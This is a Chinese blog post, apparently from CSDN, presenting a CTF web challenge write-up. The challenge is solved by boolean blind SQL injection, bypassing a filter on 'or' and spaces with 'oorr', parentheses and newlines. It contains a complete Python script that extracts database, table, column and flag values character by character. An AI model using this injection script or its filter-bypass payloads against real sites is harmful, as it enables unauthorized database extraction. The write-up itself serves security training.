[CTF]认真一点!

最新推荐文章于 2019-10-04 11:25:56 发布
最新推荐文章于 2019-10-04 11:25:56 发布
阅读量385 收藏
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alex_bean/article/details/93757976
版权

类型:web
网址:http://www.shiyanbar.com/ctf/2009
攻击:sql注入
一句话总结:or 空格等特殊字符被过滤,使用oorr,()等代替

writeup

import requests

# 暴力猜解当前数据库的长度
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# for i in range(1,30):
    # key = {'id':"0'oorr(length(database())=%s)oorr'0"%i}
    # r = requests.post(url, data=key).text
    # print(i)
    # if str1 in r:
        # print("the lenghth of database is %s"%i)
        # break
        
# 暴力猜解当前数据库的名称 ctf_sql_bool_blind
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# database = ''
# for i in range(1,19):
    # for j in guess:
        # key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0"%(i,j)}
        # r = requests.post(url, data=key).text
        # print(key)
        # if str1 in r:
            # database += j
            # print(j)
            # break
# print(database)

# 暴力猜解数据表的长度 11
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# i = 1
# while True:
    # flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0"%i
    # flag = flag.replace(' ', chr(0x0a))
    # key = {'id':flag}
    # r = requests.post(url, data=key).text
    # print(key)
    # if str1 in r:
        # print('the lenght of tables is %s'%i)
        # break
    # i += 1
    
# 暴力破解数据表名称 fiag@users-
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# tables = ''
# for i in range(1,12):
    # for j in guess:
        # flag = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
        # flag = flag.replace(' ', chr(0x0a))
        # key = {'id':flag}
        # r = requests.post(url, data=key).text
        # print(key)
        # if str1 in r:
            # tables += j
            # print(j)
            # break
# print(tables)

# 暴力破解数据表的列名 fl$4g
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# columns = ''
# for i in range(1,6):
    # for j in guess:        
        # flag = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i, j)    
        # flag = flag.replace(' ', chr(0x0a))
        # key = {'id':flag}       
        # r = requests.post(url, data=key).text
        # print(key)
        # if str1 in r:
            # columns += j
            # print(j)
            # break
            
# print(columns)

# 暴力猜解数据表字段长度 14
# guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
# str1 = 'You are in'
# url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
# i = 1
# while True:
    # flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='')oorr'0"%i
    # flag = flag.replace(' ', chr(0x0a))
    # key = {'id':flag}       
    # r = requests.post(url, data=key).text
    # print(key)
    # if str1 in r:
        # print('the length of data is %s'%i)
        # break
    # i += 1

# 暴力猜解flag   flag{haha~you-win!}
guess = '~abcdefghijklmnopqrstuvwxyz_0123456789=+-*/{\}?!:@#$%&()[],.'
str1 = 'You are in'
url = 'http://ctf5.shiyanbar.com/web/earnest/index.php'
data = ''
for i in range(1,20):
    for j in guess:        
        flag = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i, j)    
        flag = flag.replace(' ', chr(0x0a))
        key = {'id':flag}       
        r = requests.post(url, data=key).text
        print(key)
        if str1 in r:
            data += j
            print(j)
            break
            
print(data)

FLAG

flag{haha~you win!}

胖胖のALEX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-web Xman-2018 crypto 古典密码和简单入门rsa题目
iamsongyu的博客
12-08 4072
Rotator  这是一道凯撒密码的题目,题目里提示先五移位,在八移位就可以得到 完成,这里使用的软件米斯特安全工具或者使用在线的工具也可以   单表替换密码 Lw! Gyzvecy ke WvyVKT! W'zz by reso dsbdkwksky tzjq teo kly ujr. Teo keujr, gy joy dksurwmq bjdwv vorakeqo...
CTF Crypton系列————12、Substituted
Fly_鹏程万里
04-12 543
题目解题思路字符频率统计:
实验吧CTF(认真一点!)
筱阳的博客
12-13 1811
输入1 输入2或者其他内容 看来只有输入1猜显示you are in 输入其他都是you are not in  输入; 过滤了: union 空格 逗号 % and ^ sleep substr | # ; 发现or 没有过滤 先看看可以用哪些来代替空格 经过测试  /**/  可以代替空格 于是构造 id=1'/**/or/**/1='1 按理来...
认真一点!-实验吧
Xi4or0uji
06-05 3069
这个题其实是个布尔盲注题,怎么说,正常是you are in,报错是you are not in,触发waf是sql injection detected然后fuzz一下,图我就不贴了,做的时候忘了截下图结果大概是过滤了and,空格,逗号,union,+这里有个坑,fuzz的时候or是可以用的,但是尝试id = 1'/**/or/**/'1'='1的时候报you are not in,不应该啊试了...
CTF——实验吧(web总结1.1)
热门推荐
加载中...
10-19 1万+
地址:http://www.shiyanbar.com/ctf/practice 一、你能跨过去吗题目:?,你是在问我吗???你是在怀疑我的能力吗??? 解题链接: http://ctf1.shiyanbar.com/basic/xss/ 思路: 1、发现所给字串中有%+数字,怀疑使用escape加密了url,使用站长工具http://tool.chinaz.com/Tools/Escape.
[CTF]认真一点! rzyd.py
06-26
类型:web 网址:http://www.shiyanbar.com/ctf/2009 攻击:sql注入 一句话总结:or 空格等特殊字符被过滤,使用oorr,()等代替 博文:https://blog.csdn.net/alex_bean/article/details/93757976
CTF内存取证入坑指南!稳!题目
03-28
Volatility是一款开源的内存取证框架,广泛应用于CTF(Capture The Flag)竞赛和实际的网络安全事件响应中。它支持多种操作系统,包括Windows、Linux、Mac OS等,提供了丰富的命令来提取和解析内存映像中的信息。...
CTF-6#SYSTEM!POWER!-WP
最新发布
10-23
CTF WP SYSTEM!POWER! CTF(Capture The Flag)竞赛题目6#SYSTEM!POWER!的WP(Write-up)解析。 CTF WP CTF竞赛是信息安全领域中的一种比赛形式,旨在评估参与者的安全技能。WP是Write-up的缩写,指的是CTF...
ctf:炫酷的ctf WIP立即尝试!
05-11
ctf 一个很酷的ctf
CTF安全工具包大全!
12-11
CTF工具合集包括了CTF相关的各种工具,包括逆向,解密,WEB,密码学等等,相当有用,可以方便地准备各种CTF比赛。使用指南:解压后打开Rolan.exe即可。温馨提示:建议关闭防火墙和安全扫描,原因你懂的。
实验吧 认真一点!
Assassin
01-31 3086
真的很久很久没碰过这个玩意了,真是不会了,而且这个题目本身就不是很容易,搞得我也是满肚子邪火,很气。这个题目主要难在它吧过滤和ban结合到了一起了。我们还是先看题目,首先拿到题目看到输入id=0和输入id=1结果不一样,这就奠定了盲注的基础了 然后我们肯定要fuzz一下,结果如下 禁了union、and、substr,sleep,堵住了时间盲注、联合查询注入的路子,而且还把逗号禁止了…这
实验吧 认真一点
xingyyn78的博客
03-30 7101
        本实验是输入id获取结果,查看页面源码,没有什么注释信息。随便输入个1,结果为You are in ...............,其他的id显示为You are not in ...............        使用Burp suite进行模糊测试,结果为or部分sql命令都可以使用。        但是使用or命令注入失败,但是从模糊测试来看是没有屏蔽or关键字,应该...
实验吧CTF题库>flag.xls
cointreau00的博客
09-24 3385
实验吧CTF题库>flag.xls 题目地址:http://www.shiyanbar.com/ctf/1919 首先我们进入题目地址后可以看到解题链接是让我们下载一个.xls的文件,而且出题人给的提示也是“flag就在excel表格里,仔细找找!” 把文件下载之后先尝试用EXCEL打开,打开之后弹出来一个提示框,需要我们输入密码。但是我们没有得到和密码有关的任何提示,所以我们换一个方式打开...
i春秋第二届春秋欢乐赛 Substituted writeup
hanjinrui15的博客
10-04 1025
i春秋第二届春秋欢乐赛 Substituted writeup 第一步:审题 题目中给出了一个文本文档: Lw! Gyzvecy ke WvyVKT! W’zz by reso dsbdkwksky tzjq teo kly ujr. Teo keujr, gy joy dksurwmq bjdwv vorakeqojalr jmu wkd jaazwvjkwemd. Vorakeqojalr l...
CTF---密码学入门第三题 奇怪的短信
weixin_34302798的博客
11-01 416
奇怪的短信分值:10 来源: Ayn 难度:易 参与人数:5117人 Get Flag:2623人 答题人数:2858人 解题通过率:92% 收到一条奇怪的短信: 335321414374744361715332 你能帮我解出隐藏的内容嘛?! 格式:CTF{xxx} 解题链接: 原题链接:...
CTF题目整理
安全汪
08-23 1万+
最近在整理一些CTF题目,遇到很多很有意思的东西,记录下来 0x01:栅栏加密 栅栏加密法是一种比较简单快捷的加密方法。栅栏加密法就是把要被加密的文件按照一上一下的写法写出来,再把第二行的文字排列到第一行的后面。相应的,破译方法就是把文字从中间分开,分成2行,然后插入。栅栏加密法一般配合其他方法进行加密。 例: 加密information 分行 i f r a i n n o m t o 合并 if
CTF解题笔记(1)
CODING...
01-09 1万+
因缺思汀的绕过 解题路径:http://ctf5.shiyanbar.com/web/pcat/index.php 打开后是一个登录框类似的东西,查看页面源码可以看到有source:source.txt的字样 打开连接:http://ctf5.shiyanbar.com/web/pcat/source.txt 可以看到登录的php逻辑: <?php error_rep
ctf题库-Just Click
miko2018的博客
08-21 2892
&amp;lt;题目&amp;gt; 拿到答案需要正确地点击按钮 格式:simCTF{ } 解题链接: http://ctf5.shiyanbar.com/re/rev4.exe &amp;lt;解答&amp;gt; 根据连接可知这是一个exe文件。打开连接下载文件。 ※拿到题目,随便点击按钮,发现没有任何反应。 多次点击后,程序退出。 因此可分析只有按照正确顺序点击才能得到正确答案。 ※我们再次打开程序,...
第一届桂林电子科技大学绿盟杯CTF大赛 wp
Xi4or0uji
05-21 2906
misc音频分析拿到一个wav文件,用audacity打开看见很明显是摩斯电码..-. .-.. .- --. .. ... -- --- .-. ... . -.... -.... -.... --. ..- . - --.- .-- 解密就出来了数据包分析分析数据包看见发了个flag.jpg,提出来看一下是真的皮呀..........丢去010看见是个压缩包,里面还有个flag.txt!!激动...
CTF密码学基础与编码解析
CTF中,Unicode常以\u转义序列的形式出现,例如将文本"You had me at hello"编码为"\u0059\u006f\u0075\u0020\u0068\u0065\u006c\u006c\u006f"。解码这类题目需要理解Unicode编码规则,并能将其转换回原始文本。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值